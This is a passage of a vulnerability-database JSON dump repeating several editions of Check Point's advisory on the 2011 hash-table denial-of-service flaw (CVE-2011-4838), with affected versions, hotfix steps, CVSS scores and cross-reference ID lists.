"OPENVAS:70754"]}, {"type": "nessus", "idList": ["SOLARIS11_RUBY_20120417.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2011-17551.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "REDHAT-RHSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "CENTOS_RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "CENTOS_RHSA-2012-0019.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "DEBIAN_DLA-209.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FEDORA_2011-17542.NASL", "FEDORA_2012-0420.NASL", "CENTOS_RHSA-2012-0069.NASL", "FEDORA_2012-0504.NASL", "ALA_ALAS-2012-35.NASL", "F5_BIGIP_SOL13588.NASL", "REDHAT-RHSA-2012-0019.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0019", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:994FA20B8F", "FEDORA:3515C213E6", "FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6", "FEDORA:8CC7E20B55"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019", "ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-29T19:08:52", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-29T19:08:52", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-29T19:08:52", "differentElements": ["modified", "published"], "edition": 51}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-29T23:08:27", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4815", "CVE-2011-3414", "CVE-2011-4838"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2013-033", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26122", "SSV:30001", "SSV:72454", "SSV:26126", "SSV:26121"]}, {"type": "freebsd", "idList": ["D3921810-3C80-11E1-97E8-00215C6A37BB", "91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310863681", "OPENVAS:1361412562310831554", "OPENVAS:71568", "OPENVAS:1361412562310122001", "OPENVAS:136141256231071568", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310881167", "OPENVAS:863815", "OPENVAS:863921", "OPENVAS:1361412562310120218", "OPENVAS:831554", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310870539", "OPENVAS:863824", "OPENVAS:863713", "OPENVAS:881167", "OPENVAS:136141256231070754", "OPENVAS:863681", "OPENVAS:1361412562310863921", "OPENVAS:881226", "OPENVAS:870638", "OPENVAS:70754"]}, {"type": "nessus", "idList": ["SOLARIS11_RUBY_20120417.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2011-17551.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "REDHAT-RHSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "CENTOS_RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "CENTOS_RHSA-2012-0019.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "DEBIAN_DLA-209.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FEDORA_2011-17542.NASL", "FEDORA_2012-0420.NASL", "CENTOS_RHSA-2012-0069.NASL", "FEDORA_2012-0504.NASL", "ALA_ALAS-2012-35.NASL", "F5_BIGIP_SOL13588.NASL", "REDHAT-RHSA-2012-0019.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0019", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:994FA20B8F", "FEDORA:3515C213E6", "FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6", "FEDORA:8CC7E20B55"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019", "ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-29T19:08:52", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-29T19:08:52", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-29T23:08:27", "differentElements": ["modified", "published"], "edition": 52}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-30T07:12:44", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4838", "CVE-2011-3414", "CVE-2011-4815"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:72454", "SSV:26122", "SSV:26121", "SSV:26126"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863681", "OPENVAS:881075", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310120220", "OPENVAS:1361412562310881119", "OPENVAS:863954", "OPENVAS:831554", "OPENVAS:863921", "OPENVAS:881226", "OPENVAS:881167", "OPENVAS:863681", "OPENVAS:870638", "OPENVAS:1361412562310863712", "OPENVAS:70754", "OPENVAS:870542", "OPENVAS:1361412562310881149", "OPENVAS:1361412562310881167", "OPENVAS:136141256231071568", "OPENVAS:1361412562310870638", "OPENVAS:71568", "OPENVAS:136141256231070754"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-209.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ALA_ALAS-2012-35.NASL", "SOLARIS11_RUBY_20120417.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "ORACLELINUX_ELSA-2012-0070.NASL", "CENTOS_RHSA-2012-0069.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "F5_BIGIP_SOL13588.NASL", "GENTOO_GLSA-201207-06.NASL", "REDHAT-RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0069.NASL", "CENTOS_RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2012-1301.NASL", "REDHAT-RHSA-2012-0019.NASL", "FEDORA_2011-17542.NASL", "FEDORA_2011-17551.NASL", "FEDORA_2012-0420.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6", "FEDORA:994FA20B8F", "FEDORA:8CC7E20B55", "FEDORA:3515C213E6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-30T07:12:44", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-30T07:12:44", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-30T07:12:44", "differentElements": ["modified", "published"], "edition": 53}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-30T11:11:34", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4838", "CVE-2011-3414", "CVE-2011-4815"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:72454", "SSV:26122", "SSV:26121", "SSV:26126"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863681", "OPENVAS:881075", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310120220", "OPENVAS:1361412562310881119", "OPENVAS:863954", "OPENVAS:831554", "OPENVAS:863921", "OPENVAS:881226", "OPENVAS:881167", "OPENVAS:863681", "OPENVAS:870638", "OPENVAS:1361412562310863712", "OPENVAS:70754", "OPENVAS:870542", "OPENVAS:1361412562310881149", "OPENVAS:1361412562310881167", "OPENVAS:136141256231071568", "OPENVAS:1361412562310870638", "OPENVAS:71568", "OPENVAS:136141256231070754"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-209.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ALA_ALAS-2012-35.NASL", "SOLARIS11_RUBY_20120417.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "ORACLELINUX_ELSA-2012-0070.NASL", "CENTOS_RHSA-2012-0069.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "F5_BIGIP_SOL13588.NASL", "GENTOO_GLSA-201207-06.NASL", "REDHAT-RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0069.NASL", "CENTOS_RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2012-1301.NASL", "REDHAT-RHSA-2012-0019.NASL", "FEDORA_2011-17542.NASL", "FEDORA_2011-17551.NASL", "FEDORA_2012-0420.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6", "FEDORA:994FA20B8F", "FEDORA:8CC7E20B55", "FEDORA:3515C213E6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-30T07:12:44", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-30T07:12:44", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-30T11:11:34", "differentElements": ["modified", "published"], "edition": 54}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * 